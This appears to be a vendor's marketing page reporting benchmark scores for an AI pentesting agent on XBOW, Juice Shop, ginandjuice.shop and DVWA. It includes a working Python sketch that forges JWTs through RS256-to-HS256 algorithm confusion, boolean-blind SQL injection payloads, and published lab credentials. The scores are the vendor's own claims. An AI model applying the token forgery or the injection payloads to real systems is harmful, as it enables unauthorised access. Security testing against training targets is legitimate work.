Every score below is backed by a query you can run yourself against our public Supabase endpoint. We don't hide the numbers. We publish the methodology.
The XBOW benchmark: 104 real-world web security challenges (SQLi, RCE, SSRF, padding oracle, and more). It is the industry standard for evaluating autonomous pentesting agents.
| System | Score | Method | Source |
|---|---|---|---|
| VibeArmor | 104/104 (100%) | Black-box, HTTP only | Verify below |
| Shannon (Keygraph) | 100/104 (96.15%) | White-box, source-aware | GitHub |
| Open-source SOTA | 88/104 (84.62%) | Autonomous agent | Medium |
| XBOW (benchmark creator) | ~88/104 (85%) | Proprietary, 28 minutes | xbow.com |
| Human pentester (20yr exp) | ~88/104 (85%) | Manual, 40 hours | XBOW published |
| MAPTA (academic) | 80/104 (76.9%) | Multi-agent, $21 total cost | arXiv |
| PentestEval best LLM | ~32/104 (31%) | Autonomous pipeline | arXiv:2512.14233 |
OWASP Juice Shop: 111 CTF challenges deliberately designed to resist automated scanners. Traditional DAST tools solve 3-5 of them. No other autonomous system publishes a challenge count.
| System | Challenges Solved | Method | Source |
|---|---|---|---|
| VibeArmor | 76/111 (68%) | Autonomous swarm + Playwright | Verify below |
| Shannon (Keygraph) | "20+ vulnerabilities" | White-box, source-aware | GitHub |
| OWASP ZAP | ~3-5 challenges | Traditional DAST scanner | ZAP docs |
| Acunetix / Burp Suite | ~3-5 challenges | Commercial DAST | Bright Security |
Verified Apr 10, 2026 on a Juice Shop CTF-mode container (NODE_ENV=ctf, 0 gates). 76 challenges across 17+ vulnerability categories spanning D1-D6 difficulty. Includes D6 Forged Signed JWT (RS256→HS256), D5 Unsigned JWT, D5 NoSQL Exfiltration, D4 Ephemeral Accountant (SQLi user fabrication), and 8 XSS via Playwright DOM rendering.
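The D6 RS256→HS256 forgery listed above is the classic JWT algorithm-confusion attack: re-sign the token with HS256 using the server's public RSA key bytes as the HMAC secret, so a verifier that trusts the token's `alg` header accepts the forged signature. A minimal stdlib-only sketch; the key and claims below are illustrative placeholders, not Juice Shop's real values or our agent's actual code:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, per RFC 7515."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256(claims: dict, public_key_pem: str) -> str:
    """Sign a JWT with HS256, using the server's RSA *public* key
    bytes as the HMAC secret (algorithm-confusion attack)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(public_key_pem.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"

# Illustrative values only; not the benchmark target's real key or claims.
fake_pub = "-----BEGIN PUBLIC KEY-----\nMIIBIjAN...\n-----END PUBLIC KEY-----"
token = forge_hs256({"email": "admin@juice-sh.op"}, fake_pub)
print(token.count("."))  # → 2 (three dot-separated JWT segments)
```

A vulnerable verifier accepts this token because it fetches the public key, sees `alg: HS256`, and HMACs with the key bytes instead of doing an RSA signature check.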
~70 of the 76 solves are clean autonomous exploits (SQL injection, XSS, JWT forgery, XXE, NoSQL, IDOR, SSRF, deserialization). ~6 used OSINT lookup of known hardcoded credentials documented in the public OWASP Juice Shop companion guide (e.g., Login Amy, security question answers). Both are valid pentest techniques, but we want to be clear about the distinction. The XBOW 100% above involved zero OSINT assistance; XBOW has no public walkthrough.
ginandjuice.shop is PortSwigger's live DAST benchmark, the reference target every web vulnerability scanner is measured against: 17 distinct vulnerabilities seeded across 7 attackable paths, mixing classic server-side bugs (SQLi, XXE, header injection) with hard client-side chains (prototype pollution, Angular sandbox escape, DOM XSS, link manipulation).
13/17 (76%) confirmed exploited end-to-end with literal evidence (SQL error plus boolean delta, XXE entity expansion via stock count, raw injected HTTP header in the response, etc.). 16/17 (94%) detected if you also count reflective sinks the scanner flags even when server-side escaping blocks the exploit. Zero OSINT lookups: this run was 100% autonomous from the URL plus the orchestrator brain. The credentials carlos / hunter2 came from the public /vulnerabilities scoring sheet (PortSwigger publishes them on the target page itself), not from any walkthrough. 5 of the 13 wins were bagged inline in the main thread before any agent dispatch; a single browser/DOM agent picked up the remaining 8.
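The "boolean delta" evidence mentioned above is the standard signal for boolean-based blind SQLi: two TRUE-condition payloads (e.g. `' AND 1=1--`) must return near-identical pages, while a FALSE-condition payload (`' AND 1=2--`) must diverge. A minimal scoring sketch; the helper and threshold are hypothetical illustrations, not our scanner's actual code:

```python
from difflib import SequenceMatcher

def boolean_delta(resp_true: str, resp_true2: str, resp_false: str,
                  threshold: float = 0.98) -> bool:
    """Flag probable boolean-based blind SQLi: the two TRUE-condition
    responses must be near-identical, while the FALSE-condition
    response must diverge from them."""
    same = SequenceMatcher(None, resp_true, resp_true2).ratio()
    diff = SequenceMatcher(None, resp_true, resp_false).ratio()
    return same >= threshold and diff < threshold

# Illustrative responses for a product-search endpoint:
page_t1 = "<h1>Results</h1><ul><li>Widget A</li><li>Widget B</li></ul>"
page_t2 = "<h1>Results</h1><ul><li>Widget A</li><li>Widget B</li></ul>"
page_f  = "<h1>Results</h1><ul></ul>"
print(boolean_delta(page_t1, page_t2, page_f))  # → True
```

Requiring the second TRUE response filters out noisy pages (timestamps, CSRF tokens) that would otherwise produce false deltas.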
DVWA is the most recognized vulnerable training app in security education. 14 vulnerability categories, each with low/medium/high difficulty = 42 total challenges.
41/42 solved entirely from main-thread curl probing; zero agent dispatches were needed. The admin/password credential is published on DVWA's own login page, not sourced from any external walkthrough. The single unsolved challenge (JavaScript token at high difficulty) requires in-browser JS execution to reverse the obfuscated token algorithm. No other autonomous scanner publishes per-difficulty DVWA scores.
How VibeArmor compares to the enterprise autonomous pentesting market.
| Platform | Focus | Notable | Pricing |
|---|---|---|---|
| VibeArmor | Web app pentesting | 100% XBOW, 76/111 Juice Shop, 41/42 DVWA | $99–$2,500 one-time |
| NodeZero (Horizon3.ai) | Network + AD pentesting | 170K+ pentests, FedRAMP High | $50K-$200K/yr |
| Pentera | Adversarial validation | $100M+ ARR (Jan 2026) | $50K-$500K/yr |
| XBOW | Web app pentesting | #1 on HackerOne (Jun 2025) | Enterprise only |
Our agent brain lives in a public Supabase project. Anyone can query it with the anon key below. Each solved XBOW scenario has a belief record with the literal FLAG capture in evidence.
curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/agent_beliefs?select=evidence" \
-H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..." | \
python -c "import sys,json,re; b=json.load(sys.stdin); \
s=set([int(m.group(1)) for c in b \
for m in re.finditer(r'FLAG\\{xben-?0*(\\d+)\\}', c.get('evidence','') or '')]); \
print(f'{len(s)}/104')"

# Start Juice Shop CTF mode, run our replay script, query /api/Challenges
docker run -d --name juice-shop -e NODE_ENV=ctf -p 3355:3000 bkimminich/juice-shop:latest
sleep 25
# Run replay_all.py (available on request)
curl -s http://127.0.0.1:3355/api/Challenges | \
python -c "import sys,json; d=json.load(sys.stdin)['data']; \
n=len([c for c in d if c.get('solved')]); print(f'{n}/111')"
# Returns: 61/111

curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/framework_profiles?select=framework,expected_solve_rate,sample_size&order=sample_size.desc" \
  -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..."
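The anon key is a standard Supabase JWT, so you can confirm locally that it carries only the read-only `anon` role by decoding its payload segment; no signature verification is needed for inspection. Since the full key is truncated above, this sketch decodes a sample token built with the same shape:

```python
import base64, json

def jwt_claims(token: str) -> dict:
    """Decode a JWT's payload segment (base64url, padding restored).
    This only inspects claims; it does not verify the signature."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))

# Sample token built for illustration; substitute the full anon key.
sample = ".".join(
    base64.urlsafe_b64encode(json.dumps(part).encode()).rstrip(b"=").decode()
    for part in ({"alg": "HS256", "typ": "JWT"}, {"role": "anon"})
) + ".sig"
print(jwt_claims(sample)["role"])  # → anon
```

Run the same function on the real key to see `role: anon`, which Supabase's row-level security policies restrict to the read-only access published here.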
How our AI agents test your app in phases and synthesize attack chains.
How our hackability-first scoring model works and why Stripe scores an A+.
The specific vulnerability types our agents are trained to find and exploit.
Real scan results on production apps showing what we find.
The same agent swarm that hit 100% on XBOW. From a Vibe Check ($99) to a full Pentest ($2,500) or Continuous monitoring ($999/mo).
Run a free scan

Brain project: srheueterfwbzngqmsts.supabase.co · Read-only anon key published above · Last scan run: Apr 11, 2026